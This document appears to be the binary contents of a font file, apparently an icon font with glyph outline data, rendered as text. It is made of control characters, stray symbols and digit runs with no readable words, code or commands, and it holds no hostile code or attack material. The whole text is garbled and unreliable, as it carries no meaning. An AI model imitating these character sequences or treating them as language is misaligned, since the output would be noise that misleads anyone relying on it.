		�R��+I+2UdU2("+I�/?l~l?'I>@�@>I3	i"9	xV<"-� ��@	<79	C*	C 29+H+2U11U2A3,6+H+��=P@l??l@J}%%%%~JVH
����Zp�."'&5<..5'4'."'4'54&"'&/&;676?676=4234."7&54>'&"#."5#764/&"2?64/36763&54>254'32?6/!")F,K$	�		��(D(.O^O. (D�J)�"t�u"�)II)�/
,;dvd;$�)J�
O	K#Q+*_���:	%?
50	!/�(D(/O..O/7(3(D(%�		M9DE:M
�
�
N$(RB:J;e;;e;&&N		�	 �( (2=EOZ������� (.:ELSVZ^2	>#&5463654&	&"376?'6=&+'76&/"#764&"76?6."'76.#"#5676&/"7>.7>'.7>.#767'37232?2?6???6?2?5671?232?6?3276?6?3?3767673'7#76?7'76'676'6763''"'#767762'6?6'"'7'5&7#767#"'.?&'4767#'.?"'&'1&767'.79"'.?.?67'.67'#"/.767741736'7>'716?62'6?#&/67'6?4/7?'?6?5'?6?5''6756&/736?'?6?5'�		

�������
?E?'"&<
	

;1%
&-&
%$;)!	9%	
&#^."
8	+ZJ	��(

	Y	A�6;=F		

	
�b#'J
�k&
& 13	>$	\(4
r
c"���
��	������	��
)�@aIL%K?!		>## %1$0
X&
FG>PB<I
	K#D�[>'["U.		��		�	
'F	>
2	8(P-"��i_
	uc
 
!
!	
!	
#
A!	2'	
9�9��KATa%
)c9
=U&()#
T
B!�%.7>ENTZem{���z�����#.8AHN%!"'563!2		3!26'	64&#!"	#'&'73&'&'#'&/73'2#1&'73&/#''76?'#"/&/76757''#''//7&'#'3'7;675/>&/&/764/;>&/7>&/5'&/6?4/;>'&/3726/32>5''7&/'#/&'&+'&'5&'&&+'&+'&'&/&&'&'&/'&#77'"51''&/7.>'.>&'#.>'.6?2'.6?25.>'&7>'&67632&/5&7>.7#72'75?'77/'7#"'77"/377"/'7"&771#"'7"77##"77#''&7
����	����	�������Wa	
*PyO!'*�KA$`'Gb8-�&C0�
�?aIL
J?8!		
>>$'12

`
F3>"5B	=?*K
$ �@Y%z�0		�82'�E0_
uc
 	!	
/! 				��9D�
!	
!	

	

'Iz*2����
!��
���
323M)
	k&&#<H>#,,(#	J
�@D>&
&<
:	!

1	%&1	
%<
+"9	!%'

^!/	LDZG#'$#;<E	
	

		
	

��()	
6	

1	 
-)
'	�%)06=DNUajv��|�����*5>GNT%!"&'&7	&463!2"	3!275&##?#?'367#7#'3?6?#76767'3?7217677+&7'7767775#&'77'6?'7'"5'676?57>'5.'76'.7673>.767>&#'"76/."'673>'5&7>'&#76&'#"76?>'.#7676/74/6?32?32?32?1276?3?#32???327'76?54'5'3#'07"'"776?637#67663273676963>376#6?6327667'1767''&6?67'&?"/&67573'&67#?67&'&5&?"/5&767+"''&?#'&?#"/7'767367���

������
��
��AL'	<)�w�	:'T
6JKm$A
H"f--J�&0d�	@A4['Y@�C(K*?=B5&?3F
`

2'$'
3=!8>J
La@��
	�(2�
_I/	��
 .		!	cuD;�
 !
	!! +
	")' *2

	����R�����(RJ

.1J&+#&G?3,.,'	Z!!8
/!^#"&%!	9!*
<%
	1&&	!
;<&
'
D@��	'#,;&

				

F<%(	#
	
)'
 �)&18BP���������	%06<@FL7"&5473'	'27	7654'#7=3'7#'&/&"'&'.#'&'&"'&1&'5'&#'.'&'&/&#"'&+'"7/2>'&/676&/>/37>'&/532726/712>/264/337>/36714'7'&#'"7''&77/7/&77#'&2&'77#'77&/&'2&'&6?23.>&/&76'&>23&676&'&71>2'&6?6321'&>'&'&67627'&/3&5737'7/57'73''7"/&7?37&''?67'&'7'/7'5'7'7'5&5&''767/&'7''&'#/7'57/'&/'&/�
����

����
	JZ+	L	".^#"
&%	9
!*	;$%
&-&
%	1	(;	

<&1&D@�(	

Uc�


	
		
E:5���
M'#M
(�J&+#&@31R>	/)HG
GA,�'$t2&"5����

��
��
����"�		��		.U"z%>[�C(K*)=B5
!>GF
&X
0"1%

M>
	!8?K7L	a@�I'5
*8H#'
	

!
	

!
".c;	^h
��	9		!(2
!
! �D;�JKm$A
1
aT�c?O?H&sA-(L6!e
CB �)049=GLPU��"3654&	&6716=&'#77676=&/76?676?7>'&'16?6?67'72>76756??6?6756??16?6716?676?673767?5'3"76&'1&#6?4&6?6.76.#676'.7>'.>'.>.>''�
	����H�`D0(
MM�@ET"AYI��$

-!
+		
#_Qa
B
��
 �	-
-
%	
�
����
	��
�u4��;	U20�	1=�0sA�
T4C@
��%G	)1B(..
		7#D����

|
*(Kp�"6&0
!
//(%'
(#� (049?JOSZ��4&#!"3!2676'	6&/9675'2675&'#'#'#'#'&/7671//7&/0"'&.'1&'&&'&1&'&'&'&&'&2&/&+'&'374'&'>&'#&/326&/>&'101'>&'5'&'17>/7>/71>/>/7'7&' 
����	���]%4��[	T5�	1=� s
A�
T4CB��)G)0A)
/0

7*E�DYZG�
~
 2Kq�70
	!
00	(&$'

(|
�����<
:�a.E2
(
NN
�AET#AZJ%
.",$#`#/8-\

 �
--"
%		
 �$-58=CKNQW��%	3!275&#!5"7796773?#76?#7#767#7'?67??17	'#"5767635>'5.7>.671>.767>&'&7>&'1&73>.767>'&76'.6?#>'&+&>'14+376'676717677677671?676?32767#?"6'1&'���	����
�.0%]4	[�%
bT�41	J$
�:AB
FCM7 ����
�GZ	YD�E+7	;.)

1	)GZKR
(

'
%	00
!	1&7"�n����T.:
4.a32
	NqA�
F",8E[��
\
-8/#`#$	,
.%* 
	-	.
 �*14;AIMPV��7	654'#32%'36754'1&''76754'&'7'&'7'&/&''/676&'7//1'7	#'&'4'.'.&'1.'&'.'&1&/.'.'&&/.."5'&76&'7>&'676&'676&/676'&'371>/1>/&'765'&'771>/3"1�
	����

�.H5(`.
		MpA�
F",7
HY��

eL
Q_$	,
.
* 
	
-	
-	�<
��	����	�-4u4L�%02P�4	J	�:AAFCM6���

�z'
��++6	0/)0	),ZKR


'
(//
!
0&
	6"��i�V1gt&'676'&/37676'&76&/&'&'&/&'.676??6?>'&".4>2X


 $)
3
%* 
>7
	z	I_

%"iG&F2	4n}-
#j

�5!:#!9B:#!9�7"'?7(!,	'	��/�bf%Dt9?D'B'<s>.
W (!��	)+!9B:#!9B:#��aq%6?67>5&74&'&'&'&/&#+";#*"32#+"3:2#"33676;2654&+"�&

=7
#E/"
Ch�)!"�
I01]V	
[[��%%K	

��	
(P7!P	/'% @���br%&/&'.56'46767676?>3;2+3:2#"3;2#*"32##&'&+"&546;2*&		
=7#E/!
Ch�)!"�I01]V	
[[��%%K	

��	
(P7!P	/'%@���%_o%#&"&'&'&'&/&676>56=4>>56454>656=4>36?54>!2#!"&=46	

��	
(P7!%/&% ����&		
=7
#E/A
h�)!#�J11	]V	\���%%���	
%	7!%!!�(����'��K��,�O�$&��L&��l�� ,����	
	'	7!!!�$&��L&��l��L��O^(����'�l ��,�O���	
%		!!!;&L��&$��l ��,��C(CB'�����l��,{���	
	7	!!!�(����'�k ��,�O��&L��&o��l��,����32"/&6;46;2n��n
p�d��� 26=4&#!54&6=�d��9n��n!!?64/&!"�����d9n��n
��%326/&";;26n��n
L����d��/2?64/&""/&"&"2?622?64'�	
�		
	h
	i	
		�
	�		
	i	
h	
		�		�	
		h

h		
	��		�	
		i		i		
	 Q/762"/&4%762"/&4��!��!�8�!��!�z�!� �!� �!� �!�  Q/'&"2?64%'&"2?64�!��!����!��!�z�!� �!� �!� �!� !"/&4?622?62�'�)�
*�)���)��)��/2?622?64/&"&""/&"2?64'H
	i	
h	
		�
	�		f
	h
	i	
		�	
�		�		i		i		
	�		�	
�		h

h		
	�		�	
�A%&546;2;2#!" 
����c��@63!2+"+"&54 c�2�c��%764/&4?64/&"2���)��)@)�(�)�(��A%654&+"+"3!2��c�c��@&#!";2;2654����2�c��%764/&"2���)��)@�*�)�(�)!'&"2?622?64�)�)�(�)��)��)�jR )2;"2>54.".54>2"&462'"&462'"&462�J~II~�~II~�@l�l@@l�l@�*:**:**+ RI~J�:J~II~J�J~I�)@l@@l@�@m@@m@��**:**k*P�o )2;4.#!"3!2>2#!".4>3462"&7462"&7462"&�I~J�:J~II~J�J~I��@m@@m@�:@l@@l@�*:**:*�*,t ^J~II~�~II~6@l�l@@l�l@�**:*** �o )2;3!2>4.#!"%2#!".4>3"&462"&462"&462I~J�J~II~J�:J~I�@l@@l@�:@m@@m@j*:**:*�*,t ^J~II~�~II~�@l�l@@l�l@�**:**+�jR(1:%4."2>'".54>2'"&462"&462"&462I~�~II~�~I%@l�l@@l�l@�*:**:**+ {�J~II~J�:J~II~J@l@?m@�@m@@m@]**:*)�*{�jR0A2>54."4>2".5%'&"2?64&"'&"2?64&"�I~�~II~�~I%@l�l@?m�m?Xllrr/��
�
�
A�:J~II~J�J~II~J@m@@m@�:@m@@m@�llqq���
��
�o,=!"3!2>4.!2#!".4>6/76&'64&"264/�:J~II~J�J~II~���@m@@m@�:@l@?m;6446wwqoI~�~II~�~I%@l�l@@l�l@�6336rvvp�o ->3!2>4.#!"%2#!".4>364/&?2?64/&"I~J�J~II~J�:J~I�@l@@l@�:@l@@l@�644Mqqww^J~II~�~II~�@l�l@@l�l@�633�ppvv�jR,=%4."2>'".54>2'62/&?'"&4?62"I~�~II~�~I%@l�l@@l�l@�633�ppvv{�J~II~J�:J~II~J@m@@m@�@m@@m@644Mqqww�jR 7"2>54.".54>2/&4?622?62�J~II~�~II~�@l�l@@l�l@c��	Y	Y	RI~J�:J~II~J�J~I�)@m@@m@�@m@@m@���	YY	�o 84.#!"3!2>2#!".4>3'&"2?64/&4?64�I~J�:J~II~J�J~I��@m@@m@�:@l@@l@	��	YY^J~II~�~II~6@l�l@@l�l@|�	�	X	X	�i�R!7G5.54>2>54."546;232"/&63#"&=46;2.O2?Q5[l[6R?2O.=j|j=�		DU
Ub				m��5]A jC~6[66[6��Ck A]5}>i>>i�#�		�TT�	^		^	���C!7G2#!".'33!2>4.#!"#>354&6=326=4&#;26=4&+">i>>i>��5]A jC}6[66[6��Ck A]5��TT�		�	^		^	C=j|j=.O2?Q5[l[6R?2O.�DU
TD						�C!7G!2#.#!"3!2673#!".4>#";?64/&54&+";26�~5]@ jC��6[66[6}Dj A]5��>i>>i�		�TT�_	^		^	C-P2?R6[l[5Q?2O.=j|j=�		DU
Tb				�j�S!7G%4.'".546752>+"&=#"&?62#32+"&=46�.O2?Q5[l[6R?2O.=j|j=�		DT
Ub				O~5\A jC��6[66[6~Cj A\5��>i>>i�		�TT�_	^		^	�o 83!2>4.#!"%2#!".4>32?64/&"I~J�J~II~J�:J~I�@l@@l@�:@m@@m@�YY	��	^J~II~�~II~�@l�l@@l�l@|	X	X	�	��jR4%4."2>'".54>2"/&/&4?6I~�~II~�~I%@l�l@@l�l@|	XX��{�J~II~J�:J~II~J@m@@m@�@m@@m@YY	��	 	''�,,U����,V�� �7!5!#�X�R�2�� �3!5Ȫ��������	7'7_��,V������U�� �%#!! ��RX���R� �!!3v�R�����RX��%	�,��U��2,,U�� %77	��U��ԝ��V,�����'!"3!2656&"'&4?622?62g�&&�&'U����;��;'�&&�'����(;��;���'4&#!"3!6%&4762"�'�&&�'����(;��;�''�&'U((:��;���'3!2654&#!""/&4?64/&4?62?&�&&�&P(��;��;�&&�''U����;��;���'!2654&#!"62"/&""/&4��&&�&&U((:��;X'�''�'Q(��;��; lQ2?6"/&"27%64/&""/.=4627%>=4&/&""/&"0�R`�		0��
�/��f�p		4<p		o	��pp	
q�
n	pp�S'&"+"&'&'&4?64'&'.+"2?64/&4?>;6;2676764/&4?64��p		4<p	o	
��pp		q�
n	ppH/���R`�	���0��������Q762;2676764/&4?>;2"/&4?64/.+&+"&'&'&4?64/&4��p		4<p	o	��pp	
q�	o	ppH/���R`�/	����0������� lU%'&47%626=4&'&'&""'&/.=467%62"/&"?62"/&""0�R`�
		0��
��	//��V�p		4<p
	o	��pp	
qt	o	pp�/54/'.2?6&/&4&"54&�m:��;l�|b��n*��)lK^� k/'&+'32?'&#!7>/.6?6&/!26/4&+'326 |b��m*��)lK^�Um:��;l k/74;7#"/763!'.?>&/&6?!"&?46;7#"&�|b_m*��)l��^�Um:��;l�/%'"='/&5/.?62&//"&='�n:��;l2|b_m*��)l��^��'	7	'	7��5��&��4��z�������7	'	7	'�4��$��5��$z������ 	7	 �����5��#��		���#��4z���,,��%	7	R$��4��B��� %	'	���,,�#��4�������Ebs������:Mr�����4'&'&+6767676'%67>767&'&'&'&56'4674=&7>76;&'&'&#'&654#!"7636'"&=4;2#7>765&75&74&&5&747676%45&76&'%&6&7'&'.=&746456#&;2'"#"''&/&767>/&'&&"''&/&74767>76'.'&7>732?67>56'4'&/&747>&'&67676%&'&675&6&&'.7>76'.'&6763223676&'"?67654'676765&'&+"�$�K
 ?$�G		
��^/?	. 
FX+	
!�>4k:

z�`0��/1;Z=�6�4xQ�[.�.*6Qg4+�Q ���-&/�/"!ii%5kK,�(��(1!	



 L
�W��E%&2; 		Kb�K�K�EK&#\:!	��


�&
,	Z!	
	
�C�+

&7.%"!_s7 �JI$1	��[1-��/�62�3	9sV*9W<��7rr0"0H0Q9.��$99A!	
BY,&21J0�nn)ll

	
	 	;
#5

y
�nn+�%


::(	/�G^/�/.�
X+5.!


�
�4	-���;X6?6?654.#"'654&'47676732>4."&#"."2>54'?6732767�
2U2>1O
 6  6@6(E(\>K>$$>J=$f(D!\2U2($#=
2U2&`#=> 
6@66@5.*	(E(4 '$>H>$$>$"!L/72U2�j�R9Pcz�.&7!'&76;626'5&'&'&6767>76'&'&/47>'&'&'&5>76%'&'.?67476.'!"#!5#�) ��%*(@7
.E	Ic1	
	E2
6C�X	 
	+{=$	+
�"+ ���cIf
"&`S0J (.'#		O
	-ec!"&#	�U$	[�$ [=�(%9	[~
��,!���g�`6V_o265676'&'&'&'&7676?676767676&'&'"?676767676767"2>&476'&�.,260&%$#O$
nBPVlA3
80#3!##8F..2m#GA/FEH:+TA-+', ,�%�qD=*70		,#;$/cwnO$0)850
 J]bP@("6

"8%
[4-
A !,!
O7!/#&{&%��(7#
���6"3!2654&#&&#!3!67676?>/!2764���+��	w`+
5;0^�w

����
�<	$HQ@�			��j�S"2HVh3!".546763##&3"#"7!276&'&#'23627>'&#!"36"#"3!2'4&#!#'&'&?6!2y��3Y5TEZ��gN��t'.(!�FG

	
�?	
��	
=.GH

��

	�	Q���2U3MOAO�O��:%'C��C
	��+R%4'&'&'&'&/67676763"#%#&'&'&'&/#367676767�%\�2Vq�n�
J%bK	��{4)
>K=P=�t;//@O>U4�
�	� K
	(
�

	&�_ 
	
��9

��j�mQ�J����&'&3676?676367%>'&/&7676767676&'&'&"#&'&#'&#'76'&'&#&/7676=4'&/&'67432676/76?676?32767623676/&"2#'"'&/&#'4/&'76/&##&/6376'56/4#'6?436765'67?6573?6763737"'""/&#'4'#&'"'676/&##&/765&74/74326765'674?2?337676?3%">4&"264&"264&v2j���7		"%

?!�H	
'!+
!'

"&*	











	Z

	
	�>(99P89�&&6&&$&&6&%�g3N(1�+?76"		
	%
Wc1(
(.+&#��	-* 	
+
.	,	!	J

	


			�
	




 		
K9P99P8�&7%&6&&6&&7%!����
.Cy�����+;M\lz�������!1:N^p+"3!26&7276'54#!"323254&#&#""363532=4&#!"%454&#!"36!26754&#!"&5463!2+";6265'32654&#!"36!26=.#'!""&56'463!2#&#&7&'&3676017674&"?676'&'"326?52'&'&56?65/01706?2'&'&#17&"72577325>&'#&726?6'&'&536?>5&41#5763>=4+&7"73>'.476/&37>1#&'&"27"'&367474/&1#";6&'.+"27676'4#'#"3326?2'&/&'"76?4'&'&2503>5&'"'"3576&&#"376?4126'&756&/"74.26;056724#'&/1"7"/&7>40"7676=4&v��

	��U
�('	.?	y8pS� �
��/+W����l2D"�f
��
�ϖLU+,g3g/
J
	;9

@:8)
$0C#"T
a
B	
�
	��Y
k��$G�bt9.���B86	�[[
#2>~	$;	1(9;
~

F##
e	��;Q`7676&'&736.'&>76'&'&'&'&7676%>'&'&'&'&'6&76'&'.DO&).?%N'
	
	
3%*H.7b9</y�	=��^h;x<
=
3B(P�4706�	�!KQ;	S/#	
 8'5@R;C)jP"H	ChFY!@	
BQ
�',8	��S(��'54&/.#!"3!!"&5463!26'.?6&'&'&/&"'&'./&'&#"727676267>:26?6567676'&'&76'."57676?67
	9 
��

M���"



D			







		
Z





T�w
"
B
� 
&$%��	

		






			��
�	
	����;!E]t�����������6&'&3>7%&/&'&?676?667676&7&/&/&#&676?64%7676767'&'&'&&'&7636276?6&%&'&/&'&"&'76767'67'&'76>/&6'7&'77&'"67.6?'�
u��

&,.&4�)?w�
*]<Jz6	z�"
mE]H

�:	!mL"!���1<+BuV

bO^P�]��P��	�8rr8�]/]/*E��()gI%R&#h�#	6s	�	
�B�	

6
&F&�O<xO	
y�	�,
+8
p84
		|
B!`2
	
)RR)a0a0J 0�u��8]/!1,

>_			9.$�j�RJRdlx���������.#"&'&#"&#"&#"&#"32726732732654'676'&'676&'&'67'&'6732654'6326'>32.&'67"&/>54'677&"'&'677&'67677.'&47>72&'&'664.#"#"'6767"264&�W?1!.17! -1?W:  -*W?('!/0n` 1	" ,::��*"#:2FJLD	
 ,	)K��;1"#"	�G3 "?2/!�+''+3G0A"/"#"1;�)&%FJJFKt;1#"*/-';5Z//Z5;'-/C3F!/2?	.
+''+� -#?2/!�\&77L77X$&V01-&$0BAG',- ,	%%V/2bU-
0C@GGAB'

*O  - 	Ql5?U/5;i��"++"%O�
$"!%50U?z4�)(G  GQ�
Cx"4"6p6"4"6pU#i;5/NF�"++"&O��- JJ/5;i 6N66M7�j�S%BKP%&/&'&67762&'&'&4?>6767676?62'&7&'"6&6H$7�
)+�S.�	*-���
,
!$$#�	
#2�6I#
�**� j-*��$)
")*
d

�2$�i�T���'.67676%26766&;2>&'#"&?6767676&'&'&'&'&>32=6'&76;264&'#=4.'.?676.+.=6&%36?676&'&'&"676767676?676!67676?&/&'&'�DBaelr�F1SJb^�JM%�f'

	'	(
	JR
 -		
5%W
	
14��	9��
''ORi��

0B
	�
�W�1"mSQ$%���SJ+?Bc!�		
		[
	#$'
0	$

	
 	&	
 ��	)"�bu�lfdHI-]	 		
	R�=b	�jETF\������3626'&'&67>'&'&=46767676766=&?&'%&762'&'&&=46./&'&'&76&76'.">'4&"26"276#&'&'&'&'&'&'&'/&'&6'56'32767676756%0#&767676?6764&'.7&#"/&2?>?6�	<*.+0g��<z}*k_9V[6XZ&*X	,$\&4	5-AD6FH�
7(
*

+1,M$
&0#UH-5$<>;
��
	#
		
�K<		;	#;'�#DE

�@*" .K_F:	3Ad\�U9.".
V	61(4)u"#	
.>	,
	�
9+)* 


	K	!��!5!3%'3#75#5%2767654'����((�:�j��('BE�DC'(a55�*+�������*RFC())(CFR�����8z���@l45&'&'&/&#54'&'&'&/.13!2'476767>'&?656'.?&'&//&''#7767'&'&'&/&6"#"/&'&'5&767676'&4534?&'&'&373">5&7676776?676?466'.'&76'&'&7676?276?6776&/&'5&66?7676767'&'&&'&&?6�	&.""		$
$
�W

F$
(	[*

.-/1$$
	
�
( &	�b"!.02EE���
:
(:(
	"c2O*"|	;'
.<$(!WV	AA	
(@ [/VUH:),
L��	
-6'=R)+"B
!3-

T"8#(*%
0�


7�c)R!		
t;
�3-

(	*0$G($)G
$`(,'0
(%#�

"	F4-<��
$88
Q0
(&8��Il%"#'.?676'.676=4&'&'&'.47676?6?6#456'467676?6'&'.5]



V�4�M�eE�R#H0*.�Sw`D"	�:zFj
	3er0J[[\P7#
""
�,
(#"

"! 
�	"%
8^#W
&��8{��&/#?676763#&#&37$76?5'&632>&'&#&6763676337>76'&7>'&4767767>/&'#/&'&/767>'�V���J!C$]s,qX
�\"�
��*
E/�^*='
$."5+.0	`��,�[L	�)<-&8c^yd	��67E.	

E	.)

Z.			v31(3*J3@-
M0#tn
t�-,#4		-
"-
Z
��i�R0!6r��&/&/&/&4?622767636?6227>22?6?626?622?6762?6?62?6276?62?62676764/&'.?62?6%&76?>'&'05'&'.?6?>?62#'.76?4?>7676?6'&'&67676&'5&'&/&/&�	Ul7�7nS��;	Y]<���� 							<(						
					



>

	KMu+T�O1h
	

	
?x=	5�"	
;��:;K
`/V�	
�NY%>:%4
*?. Q�Um6�7nS��;^Z	<��� 	
	
		=(		







>
MKu*U�2g
	
@=
6	�"	
;��::	K`0	!B}�M�%6	:�
 ?<.,!�����Ghx��64'&/.6?>'&/&"'&'.762?>/.676?6+&";326=&76&'#76%&'.?6&'&'."32?>&6?&��W		**@?*
!:EI !

9		��g
-l>|	
���a

bUB!�� 	-"�W	
)+*?@,: FH! 

9		��g.

�Z a
ap 	#�+V p��� %DI'.!&312>54'6&/7#"/'&?'&6?>327&'������>j>>j>��҆��T�:(D=	KL
	
=U%
&U
(:�Tr��	��'.>j>>j>.'`
��\��.�;T((
U;LL.F\�i�VMVj�#"=6;26'56&&5&7546363227>'.'&/.?67>#4&"26/&?676'&'&/.?676&'&'.?6g� `/
5l�L.J(YF	34�!<+V
#gO_�Oi @.W
�
		
V,�
		!:

\/
� 0-9T.Gf
"P9i42<

FSy�vI
Ul
L
2�	

9"

6��-6?j~���.'.#&327'&3272?'&/27676'.462".62>2765674'.67>76?&/23264&+'"366?'&'&#676?6&/&'">4&�$)-+-)
t
?=G;�;E��"".""u!}	
"$!!BWLK

e�C

3S	1(*2b-5	c~�	'$.@-+�=x0BSNV�lQ#0""0$�%  �

	#
	 <B7	����

\	0�
		� �����Xi|��'&/"/&'&'&66>76767676?6&#'%"#&#"&76767675>373&'&%'&32&/.7473/&'"&'&7633'"&'"'&7633'"���=)F��!@1S:,8pV
	
��(�/ ��#1X�Y<1G

�c

�I�R�c1�h3
	V=		��iP9I<6*"H8L0)
3>/El��
pVjYF?Q8]F���(?
/$�	
�	�j�R8NS&'&"?6767>7&/&2767>'&'7&'&'&"76?6'67'�={��m	Y'!�$��[�%I�7&A��'Q#�<{��l**
Z��%��Z�(%I�8?��)("�j�R=X\&'&/&'&'.+"74&'.>3676767676&';26'&76'&'&+"%7#� 	�,N-('


3,#&-�l	�
	
�

�I
-'%'K^
+@T;b(,�		�_
�XH*<(#
"
	
qff�k�Q$(,'&"3276764%'#'5477'7'7��D���$(&Q�qB�@D_R6	
#>B�C%�F�g���$(%�QDC�?B�7P	%	)D�B&�E��i�TQt"#&?6=4."'&/&63?676?67676&/"'4767>?67676&"'"&732>76&#'#";2656'&�	!
bL

)#
�)
'2�&�3t�'

 'O'

		Fk7:2�:	
"3UF4�iQT4Ma��454'#""'&'&'#"'#3367676763>%'&/&'.546&546767676767676'.'&'&'&/7>>756=67676&'&'.'.Q
	D4@4EhJH
�i#A!KB��K\(=.8.1�b2L"F�I0R`5
$
	e'1
	
3	 !
#IG	
!G,	M�
)�3$

��G
��
%9��Uc
/'q 
	5!"<5	'


M)		-����f����.'&&75&74&7672+'&'&/"&76'&66'5474'&'&'&.'573;6767676763676?6?67>'&'.7676'&5&76?6%'&'&=4676/&%"'&'.56'46&'&'.56'4674>7676&76'4>7676&76'&'&'.56'4j&J1B4e�
69S2/1+5*91	�e
Af4$OGtM&!1<0@�	

	>$
c(
	

�"	>6K'		/EF@�	(K:+	-F	<?�	@26Q�MM>
 1?

G�x% 
%�n$�	�
-	��JB4
O@!, 15
 ' )$""
#)$"2C�	D3
>-E		

e	F	
	R		
U		
�j�R0Z|����3!&/.56767676767>7>7#"?2=4323726=&76'&#'7326/&'&'.32>7676766'&'&76%6?>76&/&'&&/%.'&7676.&'&'67632'&'&'&'&'&'&6363�+(1		$#
@	��)1!9/';�
0;*T3
�#20`�		&jA�AE'#
	
N;GcLF�
-)4�r#$Q:-
 	
@	
	,'3%3
�`�	
	H-"0@/5R	4(

-:/Ao�c|F$@+�szZpF(7	��17oS
2%
1#Pi5(#>	�A)(+F>W	
tG5MGl_%&		 4&(	
#+
	B612EB:	



	$&
2�2#&( S<
��Hi�������$-6%4.#"&=4'&/&/&/&'&#&#";!2#%#3!267>72727'#.#"#&=46;2""'&5&".=<'43367"/."'&#"&=463732&"&'."#&5&75&746;2"+"&=46;"2654."&5472%32674."&4632%"#"72676767"2>&%&64&"6.%"2>&�	
EK4���� ����K%R5J$A&��
	q�
!	
%J
�
	1&�	
i
�-	
3�F*<;V<0+I+;/+:0+�E00
�'B'�'��(�
	&	�(�� .'7G2	"�"wf
�
��4B!
�	�
��<V;<+/�)*�;+/;+0�*,�)$'&(&''	''�j>S8w��45'&5&'&'./&#4/&'./.3!276767>'&?656'.6?&'&//&''#7767'&'&'&'.'&6&/&'&/&?676&'&<
4).	
0

/
X�#!O!-	
.

	i/6<-9(
"*

�	

8. y	i[EP	1!:tY
!
4=/D\0�E# 'K

% ;2


	
`'?(.1*	$	%	�"	%=�j8X\��%.'&'&'&3!2'4'&26'&76776767675466'.'.56'.7676?327676?67376&/&/&66?767>/&'&'&'&'&"76
x=	,0cD'��
	"$G '
$1!7Rx`!5")�
	
			D27J-4%
hj
�p	5t	o	k"pf`�B3%/ 
57-/(3+$!>-+:B16,>1',%*�
'

V>##;F��#GA!#5"9#FD4�j~WN����&/&'&/&'&'&'&/&'&'&'&76&'&"&'&'&/.3!27657676?6327>76'&&767'&'&'&/&'&'&#"7&7672>'&;26'.'&'&'576765>;2?67'"'&'4?6>&63276'676'./&#7676&'&+"'&&'&+"&6~@#
		
/+
�	��15%#1
4!+p4

	@	
		* >)'+
- 		



�' 0%	<@&:*?		GfXQ 
6
0=&6*'.		
{+ .;#G

,2>wV	['!' -K"&(

9T	 #0	/7			^4$C
$
+

�!

!&!

J�_XR.`z32&'&'&76767>5474/&'&>3454672>&#&"727>'.'.5".7>67>�="4�&CFZU�<><>Y1,`

?@
E84=!)�YJt:	Bg>6^>4f,&]+.*-9R)A;~E�ZWT<=1:<RYZXCET+50�:9�
)'wBF>PQ
[�K>iE�1Uj4"
+#286a "	�i�R/ajs�����&=467>76/6&#!"3!7>76#!"'&7676=4&'#.'5463!62+"264&7>4&".'&'&3!26&'%.>7.>264&"264&"}�!&��##�	P.'J��%
�
	",W]
�a"rS)
,0�
n	��
!
P$("�+*=+*, �
a&$]

�i/	#9%�� !HHR��3!"@�5!

��	
5"
"Y($
'#f*=**=*�,,�j�R%0=3#3#3#3#5335#'#33!26535&#!"!54%3!264&#!"�oo�nn�nn�oo�CTCl�m7�7	
�
<��
�

�9
q��=��=��=��]Iw��77��88@
�j�S	#8M%>7.'327676732676735!" 7676'&'&"'&'&4767629,'hg',4��N		!(	W	("	�VՈtqCDDCqttqCDDCqt�ueb:;;:be�eb:;;:bd�3""3-  �	

	DmDCqt��tqCDDCqttqCD�[;:be�eb:;;:be�db:;�j�S,:J_t4&"26'"&4627&2676&'1.5&632&2676&'1&'547632" 7676'&'&"'&'&476762�1D11E0S				�B"+'9	MC +'9�tqCDDCqttqCDDCqt�ueb:;;:be�eb:;;:bd�"11D11				W;CB>
�:"B>�DCqt��tqCDDCqttqCD�[;:be�eb:;;:be�db:;�j�S#2cx�264&"72"&46%&327>76&'1.6?2"&'&'&""&'&#2276?>2276?>35"" 7676'&'&"'&'&476762v'88O77(6"L
"	9


1

4


$'!
2	

2	'$
u�tqCDDCqttqCDDCqt�ueb:;;:be�eb:;;:bdU8N88N8{7"&&
#JL
	�D

D�DCqt��tqCDDCqttqCD�[;:be�eb:;;:be�db:;�j�S*?T2654/#72676/#76767&'&" 7676'&'&"'&'&476762�"1�0�-'�O+.!+.YB[&; ;MK�tqCDDCqttqCDDCqt�ueb:;;:be�eb:;;:bd�1""0-�
	<C!:$)DCqt��tqCDDCqttqCD�[;:be�eb:;;:be�db:;�j�S)3<GVe" 7676'&'&"'&'&476762>7.7264&"72676.676?#&"76?#&�tqCDDCqttqCDDCqt�ueb:;;:be�eb:;;:bd��,'gg',4��!"11D10�-';B"�


"	
RDCqt��tqCDDCqttqCD�[;:be�eb:;;:be�db:;3""3-  |0D10E0

B"<B

w
�j�S+7La4&"26'462"&%&2676&'1&5&632''77'" 7676'&'&"'&'&476762�1D10E1b				B!-'9	077/6@0@@0@0�tqCDDCqttqCDDCqt�ueb:;;:be�eb:;;:bd�"11D00"	N;C
B>
�07706A/@@/A�DCqt��tqCDDCqttqCD�[;:be�eb:;;:be�db:;�j�S-:I%!!" 7676'&'&"'&'&476762273>.%&132676&��aՈtqCDDCqttqCDDCqt�ueb:;;:be�eb:;;:bd�"*5D*/J#" '�D�DCqt��tqCDDCqttqCD�[;:be�eb:;;:be�db:;�6D*	3$*�
<AC�j�S)Gb|" 7676'&'&"'&'&476762"'&'.3276767674.5&'&3676767627676'&'&&'&�tqCDDCqttqCDDCqt�ueb:;;:be�eb:;;:bdN.OA;(
':01%<-	k
4	0&)	:(�7+&0	
4(:RDCqt��tqCDDCqttqCD�[;:be�eb:;;:be�db:;,

6#
5
	1	"'21"q5.'"	1	'"�j�S)2;O]" 7676'&'&"'&'&476762"&4627.>;27676=!!+"'&5�tqCDDCqttqCDDCqt�ueb:;;:be�eb:;;:bd�((�'#&��
 2>-�38h- &K/*RDCqt��tqCDDCqttqCD�[;:be�eb:;;:be�db:;i(
'$
'"��93
!4-@yC7!8%
*&J�j�S)<ENu~�" 7676'&'&"'&'&476762&'&267>.%"264&&>&'"&#&.#"2>=6?6322>4."&462!"&462�tqCDDCqttqCDDCqt�ueb:;;:be�eb:;;:bd'gg''`f`'��(w($&0,KK-+H++HVH*+HTI++H�c%55J55M%55J54RDCqt��tqCDDCqttqCD�[;:be�eb:;;:be�db:;""		"##"	�((
$&
$'�.&

'/*HVH++H++H++HVH*�5J55J55J55J5�j�S#2?Lav4&"26'462"&%&327>76&'1.6?2"2>4.".4>2" 7676'&'&"'&'&476762�8O77O8{G"L
"	9


�0R00R`R00R022<23�tqCDDCqttqCDDCqt�ueb:;;:be�eb:;;:bd�'88N88'^"&&
